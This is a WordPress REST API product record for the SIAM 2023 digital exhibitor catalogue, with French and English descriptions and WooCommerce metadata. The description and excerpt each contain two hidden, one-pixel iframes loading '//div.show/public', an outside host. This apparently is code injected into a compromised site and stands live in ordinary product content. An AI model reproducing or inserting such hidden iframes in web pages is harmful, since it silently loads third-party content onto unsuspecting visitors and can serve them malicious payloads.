{"id":1065,"date":"2023-10-17T16:35:56","date_gmt":"2023-10-17T15:35:56","guid":{"rendered":"https:\/\/siam.dba.ma\/siam25\/?post_type=product&#038;p=1065"},"modified":"2025-05-16T15:19:47","modified_gmt":"2025-05-16T14:19:47","slug":"catalogue-siam-15eme-edition","status":"publish","type":"product","link":"https:\/\/www.salon-agriculture.ma\/en\/product\/catalogue-siam-15eme-edition\/","title":{"rendered":"SIAM 2023 Catalogue"},"content":{"rendered":"<p>D\u00e9couvrez le catalogue num\u00e9rique des exposants de la 15\u00e8me \u00e9dition du Salon International de l\u2019Agriculture au Maroc (SIAM) 2023. Ce catalogue vous permet d\u2019explorer en d\u00e9tail les entreprises participantes, leurs produits et services. Acc\u00e9dez facilement aux informations essentielles sur les exposants.<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>","protected":false},"excerpt":{"rendered":"<p>Explore the digital exhibitor catalogue of the 15th edition of the International Agriculture Exhibition of Morocco (SIAM) 2023.<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>","protected":false},"featured_media":1068,"template":"","meta":{"inline_featured_image":false,"_price":"50","_stock":null,"_tribe_ticket_header":"","_tribe_default_ticket_provider":"","_tribe_ticket_capacity":"0","_ticket_start_date":"","_ticket_end_date":"","_tribe_ticket_show_description":"","_tribe_ticket_show_not_going":false,"_tribe_ticket_use_global_stock":"","_tribe_ticket_global_stock_level":"","_global_stock_mode":"","_global_stock_cap":"","_tribe_rsvp_for_event":"","_tribe_ticket_going_count":"","_tribe_ticket_not_going_count":"","_tribe_tickets_list":"[]","_tribe_ticket_has_attendee_info_fields":false,"_tec_slr_enabled":"","_tec_slr_layout":""},"product_brand":[],"product_cat":[28],"product_tag":[33,32,31,30],"class_list":{"0":"post-1065","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-catalogues","7":"product_tag-catalogue-exposant","8":"product_tag-catalogue-exposant-siam","9":"product_tag-catalogue-officiel-siam","10":"product_tag-catalogue-siam","12":"first","13":"instock","14":"sale","15":"downloadable","16":"purchasable","17":"product-type-simple"},"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product\/1065","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/media\/1068"}],"wp:attachment":[{"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/media?parent=1065"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product_brand?post=1065"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product_cat?post=1065"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/www.salon-agriculture.ma\/en\/wp-json\/wp\/v2\/product_tag?post=1065"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}